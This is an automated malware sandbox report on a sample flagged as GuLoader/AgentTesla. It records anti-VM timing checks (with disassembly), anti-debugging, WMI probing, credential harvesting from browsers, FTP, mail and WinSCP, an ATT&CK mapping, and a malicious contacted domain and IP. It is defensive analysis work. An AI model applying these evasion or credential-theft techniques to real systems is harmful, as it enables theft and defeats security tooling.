Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\Dimmock5.exe

RDTSC instruction interceptor: First address: 000000000052193C second address: 000000000052193C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F8844813058h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e cmp ebx, 077948D8h 0x00000024 test dl, bl 0x00000026 add edi, edx 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007F8844813039h 0x0000002e test edx, edx 0x00000030 push ecx 0x00000031 call 00007F8844813079h 0x00000036 call 00007F8844813068h 0x0000003b lfence 0x0000003e mov edx, dword ptr [7FFE0014h] 0x00000044 lfence 0x00000047 ret 0x00000048 mov esi, edx 0x0000004a pushad 0x0000004b rdtsc

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Function Chain: systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadDelayed,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc,memAlloc

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect Any.run

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe, 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEF9
Source: Dimmock5.exe, 00000000.00000002.457913128.0000000000600000.00000004.00000020.sdmp	Binary or memory string: CC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEEL
Source: RegAsm.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Dimmock5.exe	RDTSC instruction interceptor: First address: 000000000052193C second address: 000000000052193C instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F8844813058h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e cmp ebx, 077948D8h 0x00000024 test dl, bl 0x00000026 add edi, edx 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007F8844813039h 0x0000002e test edx, edx 0x00000030 push ecx 0x00000031 call 00007F8844813079h 0x00000036 call 00007F8844813068h 0x0000003b lfence 0x0000003e mov edx, dword ptr [7FFE0014h] 0x00000044 lfence 0x00000047 ret 0x00000048 mov esi, edx 0x0000004a pushad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\Dimmock5.exe	RDTSC instruction interceptor: First address: 0000000000521A07 second address: 0000000000521A07 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F884475F716h 0x0000001d popad 0x0000001e cmp bx, cx 0x00000021 call 00007F884475E363h 0x00000026 lfence 0x00000029 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000001351A07 second address: 0000000001351A07 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F8844814416h 0x0000001d popad 0x0000001e cmp bx, cx 0x00000021 call 00007F8844813063h 0x00000026 lfence 0x00000029 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 22_2_01351A04 rdtsc

22_2_01351A04

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Window / User API: threadDelayed 701

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1736	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1736	Thread sleep time: -21030000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1736	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 1736	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: RegAsm.exe, 00000016.00000002.728202576.0000000001351000.00000040.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exef9
Source: RegAsm.exe, 00000016.00000002.735866714.0000000020640000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Dimmock5.exe, 00000000.00000002.457913128.0000000000600000.00000004.00000020.sdmp	Binary or memory string: cC:\Program Files\Qemu-ga\qemu-ga.exeel
Source: RegAsm.exe, 00000016.00000002.735866714.0000000020640000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RegAsm.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 00000016.00000002.735866714.0000000020640000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: RegAsm.exe, 00000016.00000002.735866714.0000000020640000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 22_2_01351A04 rdtsc

22_2_01351A04

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 22_2_0135219B LdrInitializeThunk,

22_2_0135219B

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_01353025 mov eax, dword ptr fs:[00000030h]	22_2_01353025
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_0135187E mov eax, dword ptr fs:[00000030h]	22_2_0135187E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_01352B6F mov eax, dword ptr fs:[00000030h]	22_2_01352B6F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 22_2_01352943 mov eax, dword ptr fs:[00000030h]	22_2_01352943

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: RegAsm.exe, 00000016.00000002.729585344.0000000001C00000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000016.00000002.729585344.0000000001C00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000016.00000002.729585344.0000000001C00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 00000016.00000002.729585344.0000000001C00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation211	DLL Side-Loading1	Access Token Manipulation1	Disable or Modify Tools11	OS Credential Dumping2	Security Software Discovery631	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection2	Virtualization/Sandbox Evasion341	Input Capture1	Process Discovery2	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	DLL Side-Loading1	Access Token Manipulation1	Credentials in Registry1	Virtualization/Sandbox Evasion341	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection2	NTDS	Application Window Discovery1	Distributed Component Object Model	Data from Local System2	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol112	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Information Discovery314	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Dimmock5.exe	57%	Virustotal		Browse
Dimmock5.exe	27%	Metadefender		Browse
Dimmock5.exe	72%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
palacioguevara.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://ENtKzK.com	0%	Avira URL Cloud	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
http://JgAptYOPYbQxfk.net	0%	Avira URL Cloud	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
palacioguevara.com	54.37.255.108	true	true	0%, Virustotal, Browse	unknown
googlehosted.l.googleusercontent.com	172.217.23.33	true	false		high
doc-14-04-docs.googleusercontent.com	unknown	unknown	false		high
mail.palacioguevara.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://JgAptYOPYbQxfk.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.goog/gsr2/GTS1O1.crt0	RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ENtKzK.com	RegAsm.exe, 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/repository/0	RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000016.00000002.734840874.000000001E0F1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/GTS1O1core.crl0	RegAsm.exe, 00000016.00000003.685186556.0000000001681000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
54.37.255.108	palacioguevara.com	France		16276	OVHFR	true
172.217.23.33	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	381541
Start date:	03.04.2021
Start time:	21:26:12
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Dimmock5.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@3/1@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 67% (good quality ratio 41%) Quality average: 41.7% Quality standard deviation: 40%
HCA Information:	Successful, ratio: 97% Number of executed functions: 139 Number of non-executed functions: 24
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 40.88.32.150, 93.184.220.29, 168.61.161.212, 52.255.188.83, 104.43.139.144, 104.42.151.234, 184.30.24.56, 20.190.159.131, 40.126.31.140, 40.126.31.136, 40.126.31.3, 40.126.31.7, 40.126.31.9, 40.126.31.142, 40.126.31.2, 20.82.209.183, 92.122.213.247, 92.122.213.194, 20.54.26.129, 20.82.210.154, 172.217.20.238, 52.155.217.156 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, drive.google.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:29:05	API Interceptor	1029x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	document-1302325198.xls	Get hash	malicious	Browse	198.50.218.68
	document-1031166636.xls	Get hash	malicious	Browse	198.50.218.68
	document-2021014062.xls	Get hash	malicious	Browse	198.50.218.68
	document-1568991333.xls	Get hash	malicious	Browse	198.50.218.68
	document-1012037614.xls	Get hash	malicious	Browse	198.50.218.68
	document-1307680126.xls	Get hash	malicious	Browse	198.50.218.68
	document-986812161.xls	Get hash	malicious	Browse	198.50.218.68
	document-550881172.xls	Get hash	malicious	Browse	198.50.218.68
	document-1042699213.xls	Get hash	malicious	Browse	198.50.218.68
	document-1455377818.xls	Get hash	malicious	Browse	198.50.218.68
	document-980795635.xls	Get hash	malicious	Browse	198.50.218.68
